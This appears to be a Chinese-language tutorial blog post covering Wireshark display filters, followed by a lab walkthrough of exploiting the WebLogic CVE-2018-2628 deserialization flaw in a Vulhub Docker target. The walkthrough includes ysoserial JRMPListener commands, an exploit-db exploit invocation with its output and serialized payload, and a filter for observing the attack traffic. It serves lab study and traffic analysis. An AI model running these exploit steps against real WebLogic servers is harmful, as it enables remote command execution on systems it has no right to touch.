Wireshark

2 minute read

一、下载

https://www.wireshark.org/download.html
https://1.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe

二、基本操作

2.1 选择监听网卡

2.2 面板

第一栏，过滤条件设置
第二烂，数据包列表 – 不同的协议会显示不同的颜色，方便区分。
第三栏，数据包详细信息
- frame:物理层的数据帧概况
- ethernet:数据链路层以太网帧头部信息
- internet protocol version 4:互联网层ip包头部信息
- transmission control protocol：传输层T的数据段头部信息，此处是tcp
- hypertext transfer protocol：应用层的信息，此处是http协议
第四栏，16进制数据 – 点击数据包详细信息数据区域的数据，在16进制数据区域中会显示对应的数据。

2.3 协议过滤

tcp，icmp，http，udp…
单独输入只显示对应的协议数据包列表，列如：输入http

2.4 ip过滤

ip.src==120.241.148.154 显示源地址为120.241.148.154 的数据包列表
ip.dst==120.241.148.154 , 显示目标地址为120.241.148.154 的数据包列表
ip.addr == 120.241.148.154 显示源IP地址或目标IP地址为120.241.148.154的数据包列表

2.5 端口过滤

tcp.port ==80, 显示源主机或者目的主机端口为80的数据包列表。
tcp.srcport == 80, 只显示TCP协议的源主机端口为80的数据包列表。
tcp.dstport == 80，只显示TCP协议的目的主机端口为80的数据包列表。

2.6 http模式过滤

http.request.method==”GET”，只显示HTTP GET方法
http.request.method==”POST”

2.7 逻辑运算符 and/or/not

http.request.method==”POST” and ip.src==192.168.71.249 只显示192.168.71.249发送的post数据。

2.8 固定特征检索

数据包信息 > 选中特征信息 > 右键：作为过滤应用 > 选中
选中要cookie（可以选择为恶意的payload）右击，作为过滤器应用–>选中，则只会显示cookie为选择值的数据包。

三、Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628）

使用Vulhub一键搭建漏洞测试靶场

https://vulhub.org/#/environments/weblogic/CVE-2018-2628/

https://docs.docker.com/engine/install/centos/

# yum install -y yum-utils device-mapper-persistent-data lvm2
# yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo
# yum install docker-ce
# systemctl enable docker
# systemctl start docker
# yum list docker-ce --showduplicates

https://docs.docker.com/compose/

# url -L "https://github.com/docker/compose/releases/download/1.27.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
# chmod +x /usr/local/bin/docker-compose 
# docker-compose --version
docker-compose version 1.27.0, build 980ec85b

# mkdir github
# cd github/
# yum install -y git
# git version
git version 1.8.3.1

https://vulhub.org/
# git clone https://github.com/vulhub/vulhub.git  
正克隆到 'vulhub'...
remote: Enumerating objects: 78, done.
remote: Counting objects: 100% (78/78), done.
remote: Compressing objects: 100% (53/53), done.
remote: Total 9648 (delta 28), reused 55 (delta 15), pack-reused 9570
接收对象中: 100% (9648/9648), 129.47 MiB | 35.00 KiB/s, done.
处理 delta 中: 100% (3791/3791), done.
# pwd
/github/vulhub
# pwd
/github/vulhub/weblogic/CVE-2018-2628
# docker-compose build
weblogic uses an image, skipping
# docker-compose up -d
Creating network "cve-2018-2628_default" with the default driver
Pulling weblogic (vulhub/weblogic:)...
latest: Pulling from vulhub/weblogic
6599cadaf950: Pull complete
23eda618d451: Pull complete
f0be3084efe9: Pull complete
52de432f084b: Pull complete
a3ed95caeb02: Pull complete
a2318f26c625: Pull complete
1aa642dd8cc1: Pull complete
b307208f8bf5: Pull complete
1dfbbdcc497d: Pull complete
a53e674a7606: Pull complete
5f06bb51fa3c: Pull complete
ff0ff72567f2: Pull complete
684862046025: Pull complete
abbf8d475455: Pull complete
848eb11ef744: Pull complete
2f3438f2b83b: Pull complete
8e5871e15571: Pull complete
Digest: sha256:275ec19477cfda389dc1c42158033e7e8c650dd4cba9f090ca0ba673902b73c9
Status: Downloaded newer image for vulhub/weblogic:latest
Creating cve-2018-2628_weblogic_1 ... done
# docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
vulhub/weblogic     latest              7d35c6cd3bcd        3 years ago         2.46GB
# docker ps -a
CONTAINER ID        IMAGE               COMMAND              CREATED             STATUS              PORTS                              NAMES
bb165ea737df        vulhub/weblogic     "startWebLogic.sh"   9 minutes ago       Up 9 minutes        5556/tcp, 0.0.0.0:7001->7001/tcp   cve-2018-2628_weblogic_1

访问 http://192.168.11.226:7001/console

# cd /github
# git clone https://github.com/frohoff/ysoserial.git
# cd ysoserial
# mvn package

3.2 使用ysoserial 启动一个JRMP Server

cp参数就是classpath，[command]即为我想执行的命令，而[listen port]是JRMP Server监听的端口。

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar  ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/success'
* Opening JRMP listener on 1099
Have connection from /192.168.11.226:55006
Reading message...
Is DGC call for [[0:0:0, 1688614442]]
Sending return with payload for obj [0:0:0, 2]
Closing connection
Have connection from /192.168.11.226:55008

3.3 执行exploit,发送数据包

https://www.exploit-db.com/exploits/44553

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

[victim ip]和[victim port]是目标weblogic的IP和端口
[path to ysoserial]是本地ysoserial的路径
[JRMPListener ip]和[JRMPListener port]第一步中启动JRMP Server的IP地址和端口
[JRMPClient]是执行JRMPClient的类，可选的值是JRMPClient或JRMPClient2 ``` python CVE-2018-2628-exploit.py 192.168.11.226 7001 ysoserial-0.0.6-SNAPSHOT-all.jar 192.168.11.151 10 99 JRMPClient 握手成功 send request payload successful,recv length:1690 command: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient 192.168.11.151:1099 > payload.out payload: b’aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001 687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f63 6174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e696361737452 6566000e3139322e3136382e31312e3135310000044b0000000064a6362a00000000000000000000000000000078’

response: exploit completed!

docker ps -a

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES bb165ea737df vulhub/weblogic “startWebLogic.sh” 5 days ago Up 4 minutes 5556/tcp, 0.0.0.0:7001->7001/tcp cve-2018-2628_weblogic_1

docker exec -it /bin/bash bb165ea737df

```

查看恶意ip和受害ip的数据通信

ip.src==192.168.11.150 and ip.dst==192.168.11.226